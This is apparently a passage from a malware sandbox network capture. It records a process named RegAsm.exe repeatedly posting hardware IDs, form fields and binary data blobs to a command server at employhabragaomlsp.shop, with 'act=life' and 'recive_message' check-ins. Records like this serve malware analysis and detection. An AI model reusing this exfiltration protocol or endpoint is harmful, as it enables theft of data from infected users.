                                2024-05-23 22:22:17 UTC15331OUTData Raw: f7 96 71 73 9a 16 d2 33 be 33 fe 53 cd 2c 28 e2 a9 63 f3 03 c0 3d f7 93 d5 f5 93 d7 40 1f 0d ff 79 cc 5b 79 4c 34 3d 46 73 c7 f5 57 5f bd 2e fa 51 af b2 b3 13 c6 4a 5d 66 88 e2 78 46 fa f1 da c9 63 92 48 38 88 6f ec ca e5 63 ff 3c 0b 7d 9b 9e eb dc 64 7f 11 65 29 15 02 ee 53 ee 2f 3f 96 ce 72 7a a4 87 e3 13 53 3c c4 dd 2d 06 97 d0 0c 43 09 50 b2 db 64 4f e0 19 3c 3e e1 c2 d2 d0 3f f1 a2 a7 8a 22 f7 17 24 79 c0 70 a5 ee 8b f2 15 c1 1f 03 fd b9 f5 fa 43 3f ac 05 e9 c5 91 d2 c2 c2 b3 95 ae a1 26 bc a2 ef d1 84 a7 4d 70 43 f1 58 33 4e 69 dc 1e 04 7e d0 e0 4b 78 47 88 08 7b 61 a8 a4 c0 30 eb 8c f2 a2 ea b6 54 b0 72 8e ff f9 b4 8b b8 36 d4 63 7d 62 f6 de bd 3d 2d bf 79 a4 d7 30 0f df 5e bb ee ee 72 c3 e2 eb 28 e9 7b b5 db 0b 4b c3 85 fb 0e 05 88 6a 64 de 04 b8
                                Data Ascii: qs33S,(c=@y[yL4=FsW_.QJ]fxFcH8oc<}de)S/?rzS<-CPdO<>?"$ypC?&MpCX3Ni~KxG{a0Tr6c}b=-y0^r({Kjd
                                2024-05-23 22:22:17 UTC15331OUTData Raw: 6c ee 64 59 7f 90 8b 66 67 e2 e7 09 61 ae 5b 95 fd c5 c5 23 5b ae 29 e2 29 e2 af d4 66 9f 14 33 cb 95 ff dd 88 f4 e3 ca 73 72 68 0c eb 5f 1d b2 df 0c 3a c6 5b a8 b7 3c 50 a8 99 c3 58 fb fa dd 2a f6 10 9d 87 9a 8b 3e e5 e0 b8 ea 14 7e 68 63 c0 fd be e2 3d cd 45 27 f9 e4 a8 4f 1a 2f 5b 7e 62 6f de da 74 52 ea f9 d4 fb c6 48 9d 1e dc 97 01 c8 75 f0 5a 29 6a 72 eb e5 c6 bb 31 2d 34 cb 60 b6 93 33 70 4b 67 5d 40 22 2e ef 47 06 b7 2e fa 93 a2 f1 23 b8 be dd df 41 14 d4 fc 0c ee 3b fd 57 1d 87 3f c3 92 de 9b 2d 52 28 71 89 1d be d6 ae 69 af 01 8c 60 93 c3 c2 71 4f c2 0f 94 2d de a2 df e0 03 d0 9c c4 01 6b 62 2a 67 8f 32 e9 e4 dc a2 ea a6 41 35 83 79 61 44 26 e6 45 52 68 d4 a8 10 45 e8 44 6d cb 8a 81 fc 83 47 31 8d c1 35 c5 59 7f e9 ed c7 fc c5 77 b4 63 cf 44 e8
                                Data Ascii: ldYfga[#[))f3srh_:[<PX*>~hc=E'O/[~botRHuZ)jr1-4`3pKg]@".G.#A;W?-R(qi`qO-kb*g2A5yaD&ERhEDmG15YwcD
                                2024-05-23 22:22:17 UTC15331OUTData Raw: 1d bf 0c ce 0a 16 9e 3c 4f b7 12 ba 25 95 53 a3 1f a3 15 93 58 45 bf 70 72 1a fc f0 87 de 9a 62 95 42 62 11 7f c1 c1 e5 ff 1a fd 10 50 78 97 bf 30 0f 73 01 03 b6 d0 c0 c0 07 9a 37 47 c8 32 a7 18 21 d2 ad aa cf 20 a9 1e af 97 be 55 87 90 79 d0 70 04 45 3f 3a f7 83 7e 36 85 d1 10 de 27 8a 1f 79 eb 6b ac cf f1 56 eb aa e0 e0 57 74 0d 6c 5f 7c ee 98 93 bc 2a 2e 88 90 79 fc d0 c4 39 d8 03 df 28 31 94 9c 2b 84 70 59 13 a7 b1 2c 60 9b 21 bd 74 66 28 bb 18 f0 02 69 c6 2b 31 1e 11 f0 1e 7f f4 45 f5 f6 4a ba 03 d5 44 c6 e4 24 7f 39 78 96 5d 70 19 0d f3 09 a8 83 97 b9 36 13 d0 29 3e ec da 93 1f 55 a9 a3 c8 1c 6c 5e 2c fe e9 86 a8 3d e3 58 6a 8a 38 de 5f 3b b3 82 b3 0f 1b 59 22 ef 00 65 fa 80 12 2f d1 37 6d 42 f7 49 35 c6 c0 90 4e eb f6 cc fb d1 c4 55 de f7 b2 d6 a6
                                Data Ascii: <O%SXEprbBbPx0s7G2! UypE?:~6'ykVWtl_|*.y9(1+pY,`!tf(i+1EJD$9x]p6)>Ul^,=Xj8_;Y"e/7mBI5NU
                                2024-05-23 22:22:17 UTC15331OUTData Raw: bc 6a d0 da 3f 60 7b 8e 5e 6a 33 9e b9 31 29 79 41 5c df 77 c5 d5 eb 20 d5 6b 56 49 2e 22 50 e8 30 a9 d9 31 8c 3c 92 5d 68 33 32 af b8 5f b4 ba ca f2 6b a7 b1 ff 45 ed 49 a3 45 77 af 9e 06 a3 57 98 68 d0 5c c4 99 fc 75 b0 ce f5 a6 24 4b 44 b8 f2 4c 92 bb 5a 0c e9 c6 a8 20 a5 06 3e c3 7a 10 71 53 6c 03 cb 6e fd 45 4f c6 8e 47 a4 17 80 31 83 4d 7d b9 66 3d de f7 72 cb b8 c0 d3 a4 9e a8 10 cb 73 b7 1c 77 dd 28 60 d9 ba 65 98 57 19 ef 52 3a 47 93 5c 88 a1 a6 32 97 4f c6 59 59 29 65 28 f7 c5 66 88 89 c5 cb 7c 59 fd 59 9f c3 e4 e5 ff 41 3a 4f bb 39 8b b9 2f 3b a9 b7 b9 ef 1c 6b 2b 43 e8 93 9c d6 12 78 12 d7 66 00 9f 65 bb a9 32 4a 25 9f 29 24 a9 0b f0 d5 84 fd 62 35 fc 23 52 65 e2 84 ab ca ef 26 78 0b 1c f2 e6 74 9a 3a 25 4a 3d 5b 95 42 d1 ff 65 ce b5 06 16 73
                                Data Ascii: j?`{^j31)yA\w kVI."P01<]h32_kEIEwWh\u$KDLZ >zqSlnEOG1M}f=rsw(`eWR:G\2OYY)e(f|YYA:O9/;k+Cxfe2J%)$b5#Re&xt:%J=[Bes
                                2024-05-23 22:22:17 UTC15331OUTData Raw: 89 9c 31 78 f5 3f bc 64 6a 4e 31 5a 44 e0 87 b9 3f 4a 53 bb 4d 06 fe ea 21 e0 f7 29 35 10 88 2d fd f2 cc bb 33 ef ba 9a 7a 99 7d ea cc 60 e6 35 ea 1d a1 0a e0 ef 87 ee 3e 4d 35 ff 4a 04 bf cb 7d 97 1e 3d a6 ce be 95 d3 de bf 8b 08 9a 0d c1 da 3d 19 78 12 67 8f 27 cd f9 6c 68 c9 c1 16 8b 9b e6 e9 b6 1e 5c 9d bd d9 d7 a8 91 15 a4 c6 d6 33 11 1f 27 2f 6f 68 9d a3 47 c3 b2 58 1c db 62 43 8b 44 3d c1 6a b9 ce 69 69 cf bc 4a 4e d9 90 ba 0e 1d 4c 88 72 f7 7d ba 6d ce 23 99 18 55 b5 cd c1 c0 cd 67 b8 5a 23 d9 af c9 23 b9 f2 8c 24 ec e9 a4 3d 52 26 bb eb f4 13 24 b4 43 f3 83 00 13 36 f2 28 9e 11 80 ba 22 83 cf a0 0a 10 2e 39 d1 67 a6 c9 e1 6f 74 ed 9c e0 79 5d 84 9f 0b d8 41 2f 25 61 bf 5c 09 13 a4 1c 1a 52 50 4e 2b e5 fa 1d be 27 75 62 dc c3 03 94 fe 23 f2 6f c6
                                Data Ascii: 1x?djN1ZD?JSM!)5-3z}`5>M5J}==xg'lh\3'/ohGXbCD=jiiJNLr}m#UgZ##$=R&$C6(".9goty]A/%a\RPN+'ub#o
                                2024-05-23 22:22:17 UTC15331OUTData Raw: 9d 7c 87 1c 6e e2 aa 43 7b 08 2e 0a 91 99 fd 97 81 4d a5 d3 39 bd 7c e6 bb 0d f7 20 fc 3e 97 71 18 3d 0b 8d ea 7f 29 d7 07 82 f1 38 20 0f 3c c0 be a6 cd 17 6a 4f 92 ac 0a 4d 79 6d 4a f6 6d 00 c8 c1 fd ef 03 ce 83 1c de 39 63 27 41 b2 ef c3 54 b4 f6 58 60 9f df 0d 8f e1 12 a8 42 2f bf 5e 0d 22 97 ce fd 5a ef cb 8b 4d 4a b6 c5 05 a0 fb db 5c d6 c7 70 59 71 1b 6d a2 eb 99 bc f9 85 ba 8b ba 77 25 98 32 c0 61 c5 f0 9f 00 4e 14 c3 db ac 19 c9 38 73 62 ec 09 cf 70 c9 a2 e5 80 0e 5c 95 65 b3 bc e8 ab 8f 79 ce 79 c0 ee 8e ec 2d be 9d 10 41 69 18 62 fd 3b 87 5b 6d b8 e4 3a 0b 81 06 16 cc 0c 47 3a 65 de be 1b ed 26 3e 5f b4 bb bc ad 2d a5 7c 2f 77 7d 63 8e d7 ad 56 c5 09 a1 d8 7e 2f d2 67 c8 38 46 b1 ee 65 6b 40 20 6a 99 d5 e3 25 9c 26 16 3a f1 f8 f7 5f bf 12 b5 66
                                Data Ascii: |nC{.M9| >q=)8 <jOMymJm9c'ATX`B/^"ZMJ\pYqmw%2aN8sbp\eyy-Aib;[m:G:e&>_-|/w}cV~/g8Fek@ j%&:_f
                                2024-05-23 22:22:17 UTC15331OUTData Raw: db a3 b8 7a 91 89 c8 84 00 e5 45 f9 cd e1 7a 6e a2 0e 83 58 c1 66 4a a2 98 2d ab d5 bd 95 bc 71 91 77 0b 6e f1 71 e6 70 e2 ec 00 76 16 52 45 c8 a8 1e b9 19 ba 8f ac 42 72 6b b7 f5 14 2b 7c fc f7 df f4 3a 74 fe 57 97 23 54 69 ec fe d9 57 f3 5a 68 f0 7e da 9c 0f 90 b3 0d b8 a7 29 28 c4 da b3 df e0 ca b6 0c 1f 7a 20 fa bc ad e7 1c 5b 47 ca 5b 0f 24 dc a7 a5 f9 71 45 03 c0 e6 1e 06 73 ad 3e 92 c8 20 32 4c 34 d7 19 12 be 24 05 d1 4b 81 5d 86 a8 90 0a 63 04 31 1e 16 42 94 64 f9 ae dc 72 3d 42 0b 9b 2d 0a a9 d1 6c 5d 53 c3 be 2b 01 dd ab 5e 59 d1 0e 48 f0 34 20 ed 8d 5b 8d 4d a7 bf b2 87 c0 a7 3d a6 ae db 24 49 d9 75 26 e8 d8 9f 2b 79 9a 75 ca 02 37 7a 53 db 6d 9c a3 57 9b d7 61 4f 91 c6 69 86 3c 38 e9 b9 ba 7d 7c e4 7d 0c 69 8a 9b 14 61 7e 1f e3 44 2d 95 70 70
                                Data Ascii: zEznXfJ-qwnqpvREBrk+|:tW#TiWZh~)(z [G[$qEs> 2L4$K]c1Bdr=B-l]S+^YH4 [M=$Iu&+yu7zSmWaOi<8}|}ia~D-pp
                                2024-05-23 22:22:17 UTC15331OUTData Raw: de 2f 4c 15 be ee d5 1c c3 bb 41 e0 9e b6 91 9e 46 82 6f ce a7 59 69 7c e5 45 6d fc 5e 25 e3 cf 1d d5 68 19 28 e9 b3 93 07 6c 7e 47 4e 3e 12 13 19 bc f9 d7 3c 7f 78 cf c3 fa 84 88 75 21 2b a4 5b 7d ab e3 6c 36 cc 96 64 09 a3 80 fc af d1 fc 1b d6 ce 2c 83 a3 57 58 22 e0 e9 0e e7 5f c9 17 8f e4 38 0b 33 32 6d e9 66 c6 9b 78 b6 38 ca aa ca 95 5f d7 29 d5 42 7a 79 4b db c8 9e a2 da 13 8a 0f 05 1b 4f 90 1e 6a 93 ca 35 aa 10 e4 ad f8 da fd d1 53 5d 9b 11 ba ba e0 93 e8 b1 c7 ff 7d 4c 96 8c 25 f2 94 15 13 35 c5 1b 14 e9 0d 65 2b 45 cb df b1 32 73 9e 15 d5 17 7e 78 87 d7 cf 64 2e b0 37 b8 f6 31 9f 0c 46 c3 e6 5a ca c3 89 5e 7f 33 37 46 4b d8 c1 81 a3 be 73 94 01 8b 3f 6b 9b 5c a7 7c 8b 5d 26 1d 14 56 36 16 9f 20 c6 5c 23 e0 62 0e 25 bc 1e 37 3f fe 3e b1 80 f3 8b
                                Data Ascii: /LAFoYi|Em^%h(l~GN><xu!+[}l6d,WX"_832mfx8_)BzyKOj5S]}L%5e+E2s~xd.71FZ^37FKs?k\|]&V6 \#b%7?>
                                2024-05-23 22:22:20 UTC810INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:20 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=amgt4lmdgd723jgjl31fdkjoq7; expires=Mon, 16-Sep-2024 16:08:59 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fnBuPAmEQ5ujBPo0DDqOTFWX6FrNvTg3enQep2GrMp7LL0oF1LNizX2udK72DD42rr70otacxArTbQkosF9Bz6hLE5cNFrRqHjnOjHH%2BzWiQTeUsOUyyJ4BLYNgD%2Ba8dRuZjdG5mgtnsGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871a13e1917f1-EWR
                                alt-svc: h3=":443"; ma=86400


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.649744188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:18 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 15100
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:18 UTC15100OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:20 UTC816INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:20 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=skopd8t3l0m6d5ngrt1qtf18ol; expires=Mon, 16-Sep-2024 16:08:59 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pc2OAeovYABkE0Dh7BQWJzldOqwXPwS9Zwh4BJjIUpvxHMlQvH0DnBUbbbNx%2FBCAYMjOvlAqgT2g0TibmjSpHqp%2B0I%2F7G%2FWDnYXZT0UgVqs0JAAnAHTSKjqaUn%2FcCgphBpjpGCiYJk2rpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871a33ff34398-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.649745188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:21 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 19958
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:21 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:21 UTC4627OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                Data Ascii: +?2+?2+?o?Mp5p_
                                2024-05-23 22:22:22 UTC818INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:22 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=n8hchhtesejiv6hsic9ds66gdf; expires=Mon, 16-Sep-2024 16:09:01 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehks%2BH5MUKGeEY8U0mtnxKgvsVkpkYOTUvgVWKMqwrrqXO5kI6iGwqtk0VHRiHruHS2NCJqt0KLJW1yivNeunfk%2BWs2%2FP%2FTGa6iypZzrcQmbwQ8YzJtrZ%2Bwu155M%2BNptGTXkHergVo55ZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871ba09c4c3f8-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.649746188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:22 UTC270OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                Data Ascii: act=life
                                2024-05-23 22:22:22 UTC816INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:22 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=ifmuebot7leim1609ct3sbuh57; expires=Mon, 16-Sep-2024 16:09:01 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xqub7K3OkAdi1Nd97LsEWPYM5zw%2BBNBscLuf0NPoYdqRu1%2FeklT4DNF4LwLTg50GpHiJVthmdQZHc6Vz%2F3GFt5%2BwRqri61blAQ7Toat4%2BZNgAn7RjaVxFmowp71GvTgP9FQS4S8bClKewg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871bead074344-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                Data Ascii: 2ok
                                2024-05-23 22:22:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.649747188.114.96.34435920C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:23 UTC288OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 5429
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:23 UTC5429OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:23 UTC818INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:23 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=5s4ujpddrkmf0vfjlt2h90nc24; expires=Mon, 16-Sep-2024 16:09:02 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xN%2F9Ee%2Fizh96qUGUdeseG2g1c0nauNm9onZQRg9trhdJzoiPDmAr4TnW7VFa886AjXtflV71nI5zHhDBFkBoEu0YmnNtrImzUx%2Fs0jAyiJ%2B%2B80jZnvXGayNKnsGZo%2FUNdkoAzqhhw3NC7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871c23fd75e79-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.649748188.114.96.34433160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:23 UTC271OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 49
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:23 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                2024-05-23 22:22:23 UTC822INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:23 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=tn3mm8jge2l5tfdc3gv5cce4hl; expires=Mon, 16-Sep-2024 16:09:02 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYeg7r7z4tROb45I0%2Fe1l1hmQ0U7q5Eon%2BCpJAeHn7P4glcXa8J8y52109%2FQzJgb9%2BeVAHp3%2FwzmMQjIPwstrLwZE2wNNT2NZMM7%2FuQq0e%2FQqfL2Kv%2B2gAyMw4Di58rWPOIL2or6qcwEyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871c44d39191e-EWR
                                alt-svc: h3=":443"; ma=86400
